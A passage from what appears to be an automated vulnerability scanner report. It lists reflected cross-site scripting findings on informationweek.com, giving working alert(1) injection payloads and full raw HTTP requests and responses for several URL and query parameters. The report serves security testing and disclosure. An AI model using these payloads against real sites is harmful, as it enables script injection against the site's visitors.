This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/internet/social_network63df4"><a%20b%3dc>77a552403ed/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=4GQ0HLOCNTVDFQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32629
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news/internet/social_network63df4"><a b=c>77a552403ed/show;kvarticleid=;kvauthor=;loc=300;grp=683946190" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7ea2'-alert(1)-'310a28be72a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/social_networkb7ea2'-alert(1)-'310a28be72a/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:38 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:38 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=J0DVYBFWA2OHLQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32615
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... '+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news/internet/social_networkb7ea2'-alert(1)-'310a28be72a/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=103652641;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eee4'%3balert(1)//fa6060e2042 was submitted in the articleID parameter. This input was echoed as 2eee4';alert(1)//fa6060e2042 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=2172011672eee4'%3balert(1)//fa6060e2042&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=DWG2AXTXUUF2HQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33578
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=2172011672eee4';alert(1)//fa6060e2042+/news/internet/social_network/showArticle/dhandler;kvarticleid=2172011672eee4';alert(1)//fa6060e2042;kvauthor=;loc=100;target=_blank;grp=386772934;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f935f"><script>alert(1)</script>e0cc4d00a4e was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=217201167f935f"><script>alert(1)</script>e0cc4d00a4e&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=M12E222LNAT2FQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 34003
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/internet/social_network/showArticle.jhtml?articleID=217201167f935f"><script>alert(1)</script>e0cc4d00a4e"/> ...[SNIP]...
1.63. http://www.informationweek.com/news/internet/social_network/showArticle.jhtml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.informationweek.com
Path:
/news/internet/social_network/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350a"><script>alert(1)</script>4e551852865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack&7350a"><script>alert(1)</script>4e551852865=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=THEILS00DJE3ZQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 80036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack&7350a"><script>alert(1)</script>4e551852865=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of the queryText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b2a"><script>alert(1)</script>6526c1d54f8 was submitted in the queryText parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack33b2a"><script>alert(1)</script>6526c1d54f8 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=MUAF22MIYTCWHQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 79934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack33b2a"><script>alert(1)</script>6526c1d54f8#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e14fa'-alert(1)-'d421d37563e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newse14fa'-alert(1)-'d421d37563e/security/government/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:24 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:24 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=ARU5XONRGKKA1QE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32631
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/newse14fa'-alert(1)-'d421d37563e/security/government/showA;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=810713290;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70549"><script>alert(1)</script>142a62d52b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news70549"><script>alert(1)</script>142a62d52b3/security/government/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=TNOOY3K2DLFQ5QE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32681
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news70549"><script>alert(1)</script>142a62d52b3/security/g;kvarticleid=;kvauthor=;loc=300;grp=368636804" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3919d"><script>alert(1)</script>8f263f0f267 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security3919d"><script>alert(1)</script>8f263f0f267/government/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=XJ1CVXBYV1QC5QE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32709
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_HP_Welcome_Ad_1x1;key=/news/security3919d"><script>alert(1)</script>8f263f0f267/g;kvarticleid=;kvauthor=;loc=300;grp=637576285" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd736'-alert(1)-'3cb2bafec0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/securityfd736'-alert(1)-'3cb2bafec0b/government/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=TGIVKGCASLX13QE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32659
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_HP_Welcome_Ad_1x1;key=/news/securityfd736'-alert(1)-'3cb2bafec0b/government/showA;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=137047912;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ba84'-alert(1)-'9c2ff2eaa78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/government9ba84'-alert(1)-'9c2ff2eaa78/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=BHG1AQLSM2XCNQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32607
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/security/government9ba84'-alert(1)-'9c2ff2eaa78/showA;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=452934421;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31191"><a%20b%3dc>e3debf56268 was submitted in the REST URL parameter 3. This input was echoed as 31191"><a b=c>e3debf56268 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/security/government31191"><a%20b%3dc>e3debf56268/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:30 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:30 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=NI5WDPYF1SPANQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32597
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/security/government31191"><a b=c>e3debf56268/showArti;kvarticleid=;kvauthor=;loc=300;grp=1947521" target="_blank"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fe2"><script>alert(1)</script>44f2482f07b was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/government/showArticle.jhtml?articleID=210605649b1fe2"><script>alert(1)</script>44f2482f07b HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=2XYZBGMCHJOTNQE1GHRSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33943
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/security/government/showArticle.jhtml?articleID=210605649b1fe2"><script>alert(1)</script>44f2482f07b"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db05f'%3balert(1)//e4aa56f47d was submitted in the articleID parameter. This input was echoed as db05f';alert(1)//e4aa56f47d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/government/showArticle.jhtml?articleID=210605649db05f'%3balert(1)//e4aa56f47d HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=DWMLHNPRGMWVLQE1GHOSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33491
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=210605649db05f';alert(1)//e4aa56f47d+/news/security/government/showArticle/dhandler;kvarticleid=210605649db05f';alert(1)//e4aa56f47d;kvauthor=;loc=100;target=_blank;grp=422746956;misc='+new Date().getTime()+'"> ...[SNIP]...
1.73. http://www.informationweek.com/news/security/government/showArticle.jhtml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.informationweek.com
Path:
/news/security/government/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa7f9"><script>alert(1)</script>ee8421fdee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/government/showArticle.jhtml?articleID=210605649&fa7f9"><script>alert(1)</script>ee8421fdee2=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=ZHZJWB4GKN4LTQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 82114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/security/government/showArticle.jhtml?articleID=210605649&fa7f9"><script>alert(1)</script>ee8421fdee2=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df1dc'-alert(1)-'74b563b67f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsdf1dc'-alert(1)-'74b563b67f7/software/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=1AZLJL3JQ5RENQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32549
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsdf1dc'-alert(1)-'74b563b67f7/software/showArticle;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=496565813;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9482c"><script>alert(1)</script>c74652cf427 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news9482c"><script>alert(1)</script>c74652cf427/software/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
